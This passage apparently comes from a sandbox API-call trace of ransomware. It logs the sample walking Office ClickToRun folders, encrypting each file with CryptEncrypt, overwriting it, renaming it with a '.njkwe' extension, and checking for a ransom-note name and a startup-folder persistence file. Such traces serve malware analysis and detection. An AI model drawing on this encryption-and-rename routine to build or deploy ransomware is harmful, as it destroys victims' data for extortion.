lstrcmpiW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="Program Files") returned -1 [0067.427] lstrcmpiW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="Program Files (x86)") returned -1 [0067.427] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4") returned 76 [0067.427] lstrcmpW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2=".") returned 1 [0067.427] lstrcmpW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="..") returned 1 [0067.427] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.427] GetProcessHeap () returned 0xbe0000 [0067.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.427] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\*") returned 78 [0067.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a7c64d, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a7c64d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3e0 [0067.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.428] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\.") returned 78 [0067.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.428] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a7c64d, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a7c64d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.428] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\..") returned 79 [0067.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.428] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a7c64d, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a7c64d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0067.428] lstrcmpiW (lpString1="en-us.16", lpString2="Windows") returned -1 [0067.428] lstrcmpiW (lpString1="en-us.16", lpString2="$Recycle.bin") returned 1 [0067.428] lstrcmpiW (lpString1="en-us.16", lpString2="System Volume Information") returned -1 [0067.428] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files") returned -1 [0067.428] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files (x86)") returned -1 [0067.428] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16") returned 85 [0067.428] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1 [0067.428] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1 [0067.428] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.429] GetProcessHeap () returned 0xbe0000 [0067.429] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0067.429] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\*") returned 87 [0067.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a7c64d, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a7c64d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0067.430] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.430] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.430] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.430] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.430] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.430] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\.") returned 87 [0067.430] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.430] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a7c64d, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a7c64d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.431] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.431] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.431] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.431] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.431] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.431] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\..") returned 88 [0067.431] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.431] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x39768000, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x564f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0067.431] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Windows") returned -1 [0067.431] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="$Recycle.bin") returned 1 [0067.431] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="System Volume Information") returned -1 [0067.431] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files") returned -1 [0067.431] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files (x86)") returned -1 [0067.431] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\MasterDescriptor.en-us.xml") returned 112 [0067.431] StrStrIW (lpFirst="MasterDescriptor.en-us.xml", lpSrch=".njkwe") returned 0x0 [0067.431] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.431] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="taridd") returned -1 [0067.431] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\MasterDescriptor.en-u", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.431] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.432] GetTickCount () returned 0x1151401 [0067.432] GetTickCount () returned 0x1151401 [0067.432] GetTickCount () returned 0x1151401 [0067.432] GetTickCount () returned 0x1151401 [0067.432] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.433] GetProcessHeap () returned 0xbe0000 [0067.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.433] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.506] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.506] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.507] GetProcessHeap () returned 0xbe0000 [0067.507] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.507] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.507] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.507] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.507] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.507] CloseHandle (hObject=0x438) returned 1 [0067.507] GetProcessHeap () returned 0xbe0000 [0067.508] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.508] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe") returned 132 [0067.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\masterdescriptor.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0067.509] GetProcessHeap () returned 0xbe0000 [0067.509] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.509] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s641033.hash", cAlternateFileName="S64103~1.HAS")) returned 1 [0067.509] lstrcmpiW (lpString1="s641033.hash", lpString2="Windows") returned -1 [0067.509] lstrcmpiW (lpString1="s641033.hash", lpString2="$Recycle.bin") returned 1 [0067.509] lstrcmpiW (lpString1="s641033.hash", lpString2="System Volume Information") returned -1 [0067.509] lstrcmpiW (lpString1="s641033.hash", lpString2="Program Files") returned 1 [0067.509] lstrcmpiW (lpString1="s641033.hash", lpString2="Program Files (x86)") returned 1 [0067.509] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\s641033.hash") returned 98 [0067.509] StrStrIW (lpFirst="s641033.hash", lpSrch=".njkwe") returned 0x0 [0067.509] lstrcmpW (lpString1="s641033.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.509] lstrcmpW (lpString1="s641033.hash", lpString2="taridd") returned -1 [0067.509] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\s641033.hash", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.510] GetTickCount () returned 0x115144f [0067.510] GetTickCount () returned 0x115144f [0067.510] GetTickCount () returned 0x115144f [0067.510] GetTickCount () returned 0x115144f [0067.510] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.510] GetProcessHeap () returned 0xbe0000 [0067.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.510] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.511] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.511] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.511] GetProcessHeap () returned 0xbe0000 [0067.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.511] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.511] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.512] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.512] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.512] CloseHandle (hObject=0x438) returned 1 [0067.512] GetProcessHeap () returned 0xbe0000 [0067.512] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.513] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\s641033.hash_r00t_{3sXlE5}.njkwe") returned 118 [0067.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\s641033.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\s641033.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\s641033.hash_r00t_{3sxle5}.njkwe")) returned 1 [0067.513] GetProcessHeap () returned 0xbe0000 [0067.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.513] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x3e87ff00, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd77c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0067.513] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Windows") returned -1 [0067.513] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="$Recycle.bin") returned 1 [0067.513] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="System Volume Information") returned -1 [0067.513] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Program Files") returned 1 [0067.513] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Program Files (x86)") returned 1 [0067.513] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\stream.x64.en-us.man.dat") returned 110 [0067.513] StrStrIW (lpFirst="stream.x64.en-us.man.dat", lpSrch=".njkwe") returned 0x0 [0067.513] lstrcmpW (lpString1="stream.x64.en-us.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.513] lstrcmpW (lpString1="stream.x64.en-us.man.dat", lpString2="taridd") returned -1 [0067.513] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\stream.x64.en-us.man.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.516] GetTickCount () returned 0x115144f [0067.516] GetTickCount () returned 0x115144f [0067.516] GetTickCount () returned 0x115144f [0067.516] GetTickCount () returned 0x115144f [0067.516] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.516] GetProcessHeap () returned 0xbe0000 [0067.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.516] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.518] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.518] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.518] GetProcessHeap () returned 0xbe0000 [0067.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.518] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.519] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.520] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.520] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.520] CloseHandle (hObject=0x438) returned 1 [0067.520] GetProcessHeap () returned 0xbe0000 [0067.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.520] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sXlE5}.njkwe") returned 130 [0067.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0067.521] GetProcessHeap () returned 